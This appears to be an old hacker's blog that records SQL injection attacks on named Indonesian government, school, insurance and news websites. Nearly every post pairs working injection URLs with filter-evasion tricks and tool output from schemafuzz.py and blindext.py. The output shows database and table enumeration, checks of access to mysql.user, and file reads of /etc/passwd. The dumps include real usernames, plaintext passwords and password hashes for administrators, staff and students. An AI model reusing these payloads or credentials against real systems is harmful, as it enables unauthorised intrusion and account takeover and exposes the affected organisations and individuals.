[47]tblweblayoutmenudetilpengguna: tblweblayoutmenudetilpengguna_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblpengguna_id
[48]tblweblayoutposisi: tblweblayoutposisi_id,tblweblayout_id,tblweblayoutposisi_urut,tblweblayoutposisi_nama,tblweblayoutposisi_lokasi,tblweblayoutposisi_fileprogram,tblweblayoutposisi_filetemplate,tblweblayoutposisi_isaktif,tblweblayoutposisi_ismenu,tblpengguna_id,tblweblayoutposisi_ishome
[49]tblweblayoutposisifile: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[50]tblweblayoutposisifileprogram: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[51]tblweblayoutposisifilepustaka: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[52]tblweblayoutposisifiletemplate: tblweblayoutposisifile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutposisifile_namafile,tblpengguna_id
[53]userlevelpermissions: userlevelid,tablename,permission
[54]userlevels: userlevelid,userlevelname

[-] [13:34:57]
[-] Total URL Requests 338
[-] Done


[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:43:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost
Version: 5.0.38-Ubuntu_0ubuntu1-log
[+] Dumping data from database "dbportalgunungkidul" Table "tblpengguna"
[+] Column(s) ['tblpengguna_login', 'tblpengguna_pass']
[+] Number of Rows: 3

[0] adminsetmodule:1nk0mgkmodule:
[1] adminentrydata:1nk0mgkdata:
[2] Data Umum:1nk0mgkdatum:1nk0mgkdatum:

[-] [13:43:59]
[-] Total URL Requests 5
[-] Done

Monday, November 10, 2008

[SQLi] http://www.sulut.go.id

5:23 PM Posted by viperfx07 2 comments
Problem: Admin directory found, but it's forbidden...
Admin dir: http://www.sulut.go.id/admin/
Dump:
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]sulut
[1]test

[-] [16:48:42]
[-] Total URL Requests 4
[-] Done

[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:58
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing Tables & Columns from database "sulut"
[+] Number of Tables: 81

[Database]: sulut
[Table: Columns]
[0]arsip: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[1]artikel: berita_id,tanggal,judul,isi,foto,penulis,alamat,email,klik
[2]bapedal: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[3]berita: berita_id,tanggal,judul,topik,isi,penulis,klik,ses
[4]bkkbn: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[5]cuaca: cuaca_id,imageCuaca,iklim,kelembaman
[6]data_instansi: dataID,kodeInstansi,tahunData,judulData,isiData
[7]diklat: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[8]diknas: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[9]dipenda: utamaID,kodeUtama,nomorUtama,judulUtama,uraianUtama,gambarUtama
[10]direktori: direktoriID,kodeInfo,juduldirektori,namadirektori,urldirektori
[11]diskom: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[12]distamben: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[13]dprd: dprdID,kodeJabatan,nomorJabatan,nama,namaJabatan,asaldprd
[14]dy_agenda: id,thn,bln,tgl,nama,keterangan
[15]dy_config: Name,Value
[16]dy_content: id,name,vname,description,text,date,auth,publish,access,position,ordered
[17]dy_content_c: id,name,vname,description,text,date,auth,publish,access,ordered,content_id
[18]dy_gbook: id,name,email,location,url,comments,date,status,iplog
[19]dy_links: name,url
[20]dy_module: Name,VName,Vimg,Access,status,staff,ordered
[21]dy_photo: id,photo,width,height,size,deskripsi,auth,date,fname,kategori,STATUS
[22]dy_photo_category: id,cname,name,access,status,type
[23]dy_photo_comment: id,pid,date,status,name,address,email,url,text,vemail,vurl,iplog
[24]dy_section: Name,VName,Vimg,Access,status,staff,ordered
[25]dy_sms: id,name,email,lokasi,msg,date,aktif
[26]dy_sosok: id,date,nama,text,photo,auth,aktif,hit
[27]dy_user: id,username,fullname,password,mode,modeDesc,telp,mobile,lastlogin,ustaff,email,status,ukey
[28]dy_user_pm: id,sender,to_user,subject,text,status,date
[29]dy_usermode: Mode,modeDesc
[30]dy_userstaff: id,Name
[31]fotosulut: pictureID,kodePicture,judulPicture,linkPicture,namaPicture,uraianPicture,titlePicture,descPicture
[32]infoumum: infoumumID,priorNumber,kodeInfo,judulInfoumum,titleInfoumum,namaInfoumum,alamatInfoumum,telponInfoumum,faxInfoumum,mailInfoumum,urlInfoumum
[33]infrastruktur: infraID,kodeInfra,judulInfra,uraianInfra,titleInfra,descInfra,gambarInfra
[34]instansi: instansiID,nomorID,kodeInstansi,namaPejabat,nipInstansi,pktInstansi,lahirInstansi,fotoPejabat,alamatInstansi,telponInstansi,faxInstansi,mailInstansi,urlInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[35]jajak: id,topik,pil1,pil2,pil3,vote1,vote2,vote3
[36]kehutanan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[37]kesbang: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[38]kesehatan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[39]kesos: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[40]koperasi: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[41]kurs: kursID,nomorKurs,uraianKurs,jualKurs,beliKurs
[42]menu_direktori: infoID,kode,uraianInfo
[43]menu_dprd: dprdID,kodeDprd,uraianDprd
[44]menu_fraksi: dprdID,kodeDprd,uraianDprd
[45]menu_galeri: galeriID,uraianGaleri
[46]menu_infoumum: infoID,kode,uraianInfo
[47]menu_infrastruktur: infraID,kodeInfra,uraianInfra
[48]menu_instansi: instansiID,kodeInstansi,uraianInstansi
[49]menu_pejabat: pejabatID,kodePejabat,uraianPejabat
[50]menu_pemerintahan: pemerintahanID,kodeMenu,uraianPemerintahan
[51]menu_perisinan: infoID,kode,uraianInfo
[52]menu_riwayat: riwayatID,kodeRiwayat,uraianRiwayat
[53]menu_sekilas: sekilasID,kodeSekilas,uraianSekilas
[54]menu_sektor: sektorID,kodeSektor,uraianSektor
[55]menu_tahun: infoID,kode,uraianInfo
[56]nama_instansi: namaID,kodeInstansi,kodenama,namaInstansi,alamatInstansi,telponInstansi,urlInstansi
[57]objekwisata: wisataID,kodeWisata,judulWisata,uraianWisata,gambarWisata,titleWisata,descWisata
[58]pariwisata: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[59]pejabat: pejabatID,kodeUnit,namaPejabat,nipPejabat,pktPejabat,lahirPejabat,fotoPejabat,urlPejabat
[60]peluang_investasi: investasiID,judulInvestasi,isiInvestasi,sumberInvestasi,klikInvestasi,titleInvestasi,descInvestasi
[61]pemerintahan: pemerintahanID,kodePemerintahan,judulPemerintahan,uraianPemerintahan,titlePemerintahan,descPemerintahan
[62]penduduk: pendudukID,tahunPenduduk,kabkotaPenduduk,lakiPenduduk,perempuanPenduduk,coba
[63]peraturan: perisinanID,perisinanIDkode,perisinanNomor,tahun,perisinanTopik,perisinanFile,perisinanContent
[64]perhubungan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[65]pmd: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[66]potensi_investasi: potensiID,kodeSektor,komoditasPotensi,kapasitasPotensi,investasiPotensi,lokasiPotensi,ketPotensi
[67]potensikecamatan: potensiID,kdKabupaten,kdKecamatan,judulPotensi,uraianPotensi
[68]praskim: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[69]program: program_id,judul,isi
[70]riwayat: riwayatID,kodeUnit,kodeRiwayat,tahunRiwayat,uraianRiwayat
[71]sekilas: sekilasID,judulSekilas,uraianSekilas,titleSekilas,descSekilas,foto
[72]statistik: statistikID,sektorStatistik,tahunStatistik,judulStatistik,fileStatistik
[73]sumber: sumber_id,kode,topik
[74]test: field1,field2,field3,field4,field5
[75]topik: topikID,kriteria,namaTopik
[76]tupoksi: tupoksiID,kodeInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[77]user_admin: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc
[78]user_group: userGroupID,userGroupName,userGroupDesc
[79]user_sulut: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc

[-] [17:13:55]
[-] Total URL Requests 458
[-] Done


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:16:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 4


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:17:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4

[0] admin:7d4aff1e876d0d969e2dd3083c344faa
[1] vendhy:610b8251af8ae12ad9d1a4508b243fa6
[2] psit02:82027888c5bb8fc395411cb6804a066c
[3] psit07:e1c91b6b6117f93c1c8734a22acffc2d

[-] [17:17:21]
[-] Total URL Requests 6
[-] Done


[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:19:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "user_admin"
[+] Column(s) ['userUserName', 'userPassword']
[+] Number of Rows: 2

[0] glory:4f35ffc581dfecea4db9e25f27d17cd9
[1] kpsit:f8aa5e424bf3e7c8e3e400c906b10465

[-] [17:20:08]
[-] Total URL Requests 4
[-] Done

Wednesday, October 29, 2008

[SQLi] http://seaedunet.seamolec.org

5:27 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0

[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:19:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,load_file(0x2f6574632f706173737764),2,3,4--

[-] [17:19:55]
[-] Total URL Requests 3
[-] Done


[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:20:33
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 39

[0]apceiu_db
[1]blog_db
[2]chatseadunet_db
[3]claroline
[4]cocc_ifiti
[5]darmasiswa
[6]diaz
[7]dokeos
[8]dokeos_main
[9]dokeos_stats
[10]dokeos_user
[11]forum
[12]forumseadunet_db
[13]games
[14]helping_db
[15]homepage
[16]ibagz
[17]iblog
[18]inet
[19]jeni
[20]joomla
[21]konsultasismm_db
[22]mitra_db
[23]moo
[24]moodle
[25]moodleseaedunet_db
[26]mysql
[27]p4tk_db
[28]pgsd_db
[29]pictures
[30]research_db
[31]scholarship
[32]seaedunet_db
[33]seamolec
[34]searadio_db
[35]seminar08
[36]test
[37]training_db
[38]x7chat

[-] [17:24:19]
[-] Total URL Requests 41
[-] Done

Monday, October 27, 2008

Here in Australia...

5:58 PM Posted by viperfx07 No comments
Wow man, everyday is a busy day. Moving to another country is not an easy task for me. With an "unhuman" weather, i've already got sicked these days, sore throat and runny nose.

So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. In here, I can't download as much as i did in Indonesia (poor me). I think Indonesia is better now.

I'll keep updating my blog. So stay tuned...

Wednesday, October 15, 2008

[SQLi] http://sman1-boyolali.com

5:05 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://sman1-boyolali.com/admin/
Admin usr:pwd --> admin:mastar1234
Dump:
[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:40:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community

[Database]: sman1bo_smanbo
[Table: Columns]
[0]admin: idadmin,username,password
[1]artikel: idartikel,idkategori,judul,isi_artikel,penulis,namapenulis,jam,tanggal,publik
[2]file: idfile,namafile,tanggal,jam,file,username,nama,keterangan
[3]gallery: idphoto,namaphoto,tanggal,jam,photo,keterangan
[4]guestbook: no_gb,nama,tanggal,jam,email,isi_gb
[5]kategori: idkategori,isi_kategori
[6]link: idlink,namalink,alamatweb
[7]polling: id_polling,tanggal,pertanyaan,A,B,C,D,E,jawabanA,jawabanB,jawabanC,jawabanD,jawabanE
[8]profil: idprofil,halaman,isi_halaman,tanggal,jam
[9]salam: idsalam,isi_salam,jam,tanggal
[10]user: iduser,username,nama,nmortu,password,status,photo,tempat_lahir,tgl_lahir,jk,th_masuk,alamat,telp,email,salam,ket

[-] [12:42:43]
[-] Total URL Requests 77
[-] Done

[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:44:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sman1bo_smanbo" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 966

[0] admin:mastar1234:
[1] 13842:010645:
[2] 13843:010713:
[3] 13844:010742:
[4] 13841:010012:
[5] 13840:005849:
[6] 13839:005807:
[7] 13845:010810:
[8] 13846:010843:
[9] 13847:010903:
[10] 13848:010926:
[11] 13849:010948:
[12] 13850:011007:
-----cut here coz it's too many---

[SQLi] http://www.buturnews.idrap.or.id

3:14 PM Posted by viperfx07 No comments


Tool --> blindext.py v5.0
User login --> buturnews:banda1302 (see else in dump)
Dump:
[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t79166_dbbutur"
[+] 10:12:30
[+] Number of Rows: 5

[0]: tberita
[1]: tcounter
[2]: topini
[3]: ttamu
[4]: tuser

[-] 10:24:56
[-] Total URL Requests 292
[-] Done


[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "t79166_dbbutur" and Table "tuser"
[+] 10:25:33
[+] Number of Rows: 16

[0]: IDUSER
[1]: JENIS_KEL
[2]: JABATAN
[3]: USERNAME
[4]: PASSWORD
[5]: NAMA_DEPAN
[6]: NAMA_AKHIR
[7]: AGAMA
---------- cut here because it's too boring -----

[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "t79166_dbbutur" Table "tuser"
[+] Column(s) ['username', 'password']
[+] 10:47:55
[+] Number of Rows: 8

[0]: harmin70:hh070729
[1]: bob:kana10
[2]: syair79:as080218
[3]: buturnews:banda1302
[4]: husain78:hs070725
[5]: hamzah75:hz080224
[6]: arif82:ar080401
[7]: tasrun87:tm080410

[-] 10:56:34
[-] Total URL Requests 975
[-] Done

[SQLi] http://www.jiwasraya.co.id

2:30 PM Posted by viperfx07 No comments


Admin login page --> http://www.jiwasraya.co.id/admin/
Admin usr:pwd --> admin:ari1007 (see else in dump)
Dump:
[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 09:51:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [09:51:14]
[-] Total URL Requests 3
[-] Done

[Database]: aims
[Table: Columns]
[0]download: id,filename,description
[1]example: id,titel,url
[2]menu: menu_id,nama_menu,menu_id_induk,link,no_urut
[3]role: role_id,nama_role
[4]role_menu: role_id,menu_id
[5]user: userid,password,username,email,address,kota,phone,zipcode,birthdate,sex
[6]user_role: userid,role_id

[Database]: casc
[Table: Columns]
[0]menu: menu_id,text_id,text_en,main_menu_id,link,image,level,status
[1]menucontent: menu_id,title,intro,content,status,record_date,user_record,user_update,update_date,image,pic_position,link,lang_id
[2]organisasi: kd_organisasi,nama_organisasi
[3]pegawai: nip,nama,jabatan,unitkerja,kdkantor,kdorganisasi,email
[4]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan
[5]vk2: no_polis,pemegang_polis,no_sertifikat,nama,alamat,kota,propinsi,telp,hp,no_serial,tempat_lahir,tgl_lahir,jenisid,nomorid,ua,premi,idpremi,tgl_mulas,tgl_exp,ahliwaris_1,hubungan_1,ahliwaris_2,hubungan_2,ahliwaris_3,hubungan_3,id,vkidpri,vkid,serialno,tglaplikasi,regid,tgl_premi_lunas,tgl_rekam

[Database]: codextra_db
[Table: Columns]
[0]openwirx: ID,Serial,LanMAC,WirMAC,IP,Location,DataNo,Station,Switch,Port,Info

[Database]: jiwasraya
[Table: Columns]
[0]admin: id,level,username,password,email
[1]agen: noagen,nama,user_id,sk_agen,no_ijin,kdkantor,email,phone,alamat,status
[2]article: art_id,cat_id,art_date,art_title_id,art_title_en,art_intro_id,art_intro_en,art_content_id,art_content_en,art_pic,author,source,location,user_record,user_update,user_approve,date_update,date_approve,status
[3]articlecat: cat_id,cat_title_id,cat_title_en,cat_icon,cat_thumb,cat_desc,status
[4]award: id,pic,intro_id,intro_en
[5]banner: id,nm_banner,file
[6]jenis_user: kd_jenis,nama_jenis,status
[7]kantor: kdkantor,namakantor,kdkantorinduk,alamat,kota,kdpropinsi,phone,fax,email,kodepos,url
[8]kode_file: kd_file,nama,keterangan
[9]kode_jabatan: kd_jabatan,jabatan_id,jabatan_en
[10]kode_organisasi: kd_organisasi,organisasi_id,organisasi_en,keterangan,rowid
[11]kurs: kdvaluta,namavaluta,simbol,tglberlaku,status,nilai
[12]layanan: id,nama,pekerjaan,email,alamat,kodepos,kota,telprumah,telpselular,telpkantor,status,pesan,ticket_id,answer,admin_id
[13]level_user: kd_level,nama_level
[14]log: time,ipaddress,userid,taskname,note
[15]menu: rowid,menu_id,text_id,text_en,main_menu_id,link,image,level,status
[16]menucontent: menu_id,title,intro,content,status,record_date,user_record,user_update,update_date,image,pic_position,link,lang_id
[17]milis: email,name,username,password,ip,time,membercode,confirm,confirmid
[18]newmenu: id,seq,parent,title_id,title_en,link_id,link_en,level,status,mm,min
[19]newsletter: art_id,art_title,art_content,art_pic,author,source,location,user_record,user_update,user_approve,date_record,date_update,date_approve,pic_position,lang_id,status
[20]p_admin: ID,username,password
[21]p_choices: ID,answer,votes
[22]p_ip: ID,IP
[23]p_question: ID,question
[24]pejabat: pejabat_id,nama,jabatan,photo,kdkantor,keterangan,kdmanager,kdorganisasi,user_update,tgl_update
[25]pengumuman: id,cat_id,date,title_id,title_en,intro_id,intro_en,content_id,content_en,pic,author,source,location,status
[26]pengumuman_cat: id,nama,nama_en
[27]poll_jawab: id,nama,hits,poll_id
[28]poll_tanya: id,tanggal,nama
[29]produk: kdproduk,pr_cat_id,pr_sub_id,pr_kel_id,namaproduk,keterangan,en_keterangan,profile,en_profile,icon,pic,status,tgl_rekam
[30]produk_cat: id,nama_id,nama_en
[31]produk_kel: sub_id,id,nama_id,nama_en
[32]produk_sub: cat_id,id,nama_id,nama_en
[33]propinsi: kdpropinsi,namapropinsi
[34]spaj_beneficiary: spaj_id,beneficiary_id,nama,tgl_lahir,hubungan,jenis_id,nomor_id,pekerjaan,tinggi_badan,berat_badan,jenis_kelamin,perokok,session_id,status
[35]spaj_ketentuanpolis: spaj_id,kdproduk,valuta,carabayar,cara_pelunasan,mulas,jua,masa_asuransi,masa_premi,premi,jaminan_lengkap,jua_tambahan,premi_tambahan,session_id,status
[36]spaj_pmg_polis: spaj_id,nama,jenis_id,no_id,warga_negara,nama_ibu,tgl_lahir,jenis_kelamin,perokok,pekerjaan,jabatan,valuta_penghasilan,penghasilan,tinggi_badan,berat_badan,alamat_rumah,rt_rw,kodepos,kdpropinsi,kdnegara,kotamadya,kd_wilayah,telepon,hp,status,session_id,email
[37]spaj_polis_exist: spaj_id,nopolis,jua,premi,prsh_asuransi,status_polis,session_id,status
[38]spaj_tertanggung: spaj_id,nama,jenis_id,no_id,warga_negara,nama_ibu,tgl_lahir,jenis_kelamin,perokok,pekerjaan,jabatan,valuta_penghasilan,penghasilan,tinggi_badan,berat_badan,alamat_rumah,rt_rw,kodepos,kdpropinsi,kdnegara,kotamadya,kd_wilayah,telepon,hp,status,session_id,email
[39]static: cat_id,id,title_id,title_en,content_id,content_en
[40]static_cat: id,nama
[41]upload: id,nama,keterangan,time,user,size
[42]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan

[Database]: jiwasraya1
[Table: Columns]
[0]admin: id,level,username,password,email
[1]article: art_id,cat_id,art_date,art_title_id,art_title_en,art_intro_id,art_intro_en,art_content_id,art_content_en,art_pic,author,source,location,user_record,user_update,user_approve,date_update,date_approve,status
[2]articlecat: cat_id,cat_title_id,cat_title_en,cat_icon,cat_thumb,cat_desc,status
[3]award: id,pic,intro_id,intro_en,tgl
[4]banner: id,posisi,link,file
[5]dplk_pin: no_peserta,kode_group,no_pin,email
[6]email_us: id,email
[7]intro: id,title_id,intro_id,title_en,intro_en
[8]intro_flash: tgl_dari,tgl_sampai,file_id,file_en
[9]j_quiz: id,id_soal,jawaban,status
[10]kantor: kdkantor,namakantor,kdkantorinduk,alamat,kota,kdpropinsi,phone,fax,email,kodepos,url
[11]layanan: id,nama,status,alamat,kodepos,kota,tlprumah,tlpkantor,hp,pekerjaan,email,pesan,tgl,kode
[12]magazine: id,bulan,tahun,judul,deskripsi,file,pic
[13]mail_service: id,email
[14]memberarea: id,link,nama_id,nama_en,desc_id,desc_en
[15]newmenu: id,seq,parent,title_id,title_en,link_id,link_en,level,status,mm,min
[16]p_admin: ID,username,password
[17]p_choices: ID,answer,votes
[18]p_ip: ID,IP
[19]p_question: ID,question
[20]pengumuman: id,cat_id,date,title_id,title_en,intro_id,intro_en,content_id,content_en,pic,author,source,location,status
[21]pengumuman_cat: id,nama,nama_en
[22]produk: kdproduk,kdsimulasi,pr_cat_id,pr_sub_id,pr_kel_id,namaproduk,keterangan,en_keterangan,profile,en_profile,icon,pic,status,tgl_rekam
[23]produk_cat: id,nama_id,nama_en
[24]produk_kel: sub_id,id,nama_id,nama_en
[25]produk_sub: cat_id,id,nama_id,nama_en
[26]quiz: id,soal
[27]static: cat_id,id,title_id,title_en,content_id,content_en
[28]static_cat: id,nama
[29]upload: id,kategori,judul,nama,keterangan,time,user,size
[30]user_quiz: id,nama,ktp,alamat,telp,email,jwb_1,jwb_2,jwb_3,status,tgl
[31]user_quiz_old: id,nama,ktp,alamat,telp,email,jwb_1,jwb_2,jwb_3,status,tgl
[32]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan,nopertanggungan2,nopertanggungan3,nopertanggungan4,nopertanggungan5
[33]vk: no_polis,pemegang_polis,no_sertifikat,nama,alamat,kota,propinsi,telp,hp,no_serial,tempat_lahir,tgl_lahir,jenisid,nomorid,ua,premi,idpremi,tgl_mulas,tgl_exp,ahliwaris_1,hubungan_1,ahliwaris_2,hubungan_2,ahliwaris_3,hubungan_3,id,vkidpri,vkid,serialno,tglaplikasi,regid,tgl_premi_lunas,tgl_rekam

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[Database]: nuke
[Table: Columns]
[0]nuke_authors: aid,name,url,email,pwd,counter,radminsuper,admlanguage
[1]nuke_autonews: anid,catid,aid,title,time,hometext,bodytext,topic,informant,notes,ihome,alanguage,acomm,associated
[2]nuke_banned_ip: id,ip_address,reason,date
[3]nuke_banner: bid,cid,name,imptotal,impmade,clicks,imageurl,clickurl,alttext,date,dateend,position,active,ad_class,ad_code,ad_width,ad_height
[4]nuke_banner_clients: cid,name,contact,email,login,passwd,extrainfo
[5]nuke_banner_plans: pid,active,name,description,delivery,delivery_type,price,buy_links
[6]nuke_banner_positions: apid,position_number,position_name
[7]nuke_banner_terms: terms_body,country
[8]nuke_bbauth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[9]nuke_bbbanlist: ban_id,ban_userid,ban_ip,ban_email,ban_time,ban_expire_time,ban_by_userid,ban_priv_reason,ban_pub_reason_mode,ban_pub_reason
[10]nuke_bbcategories: cat_id,cat_title,cat_order
[11]nuke_bbconfig: config_name,config_value
[12]nuke_bbdisallow: disallow_id,disallow_username
[13]nuke_bbforum_prune: prune_id,forum_id,prune_days,prune_freq
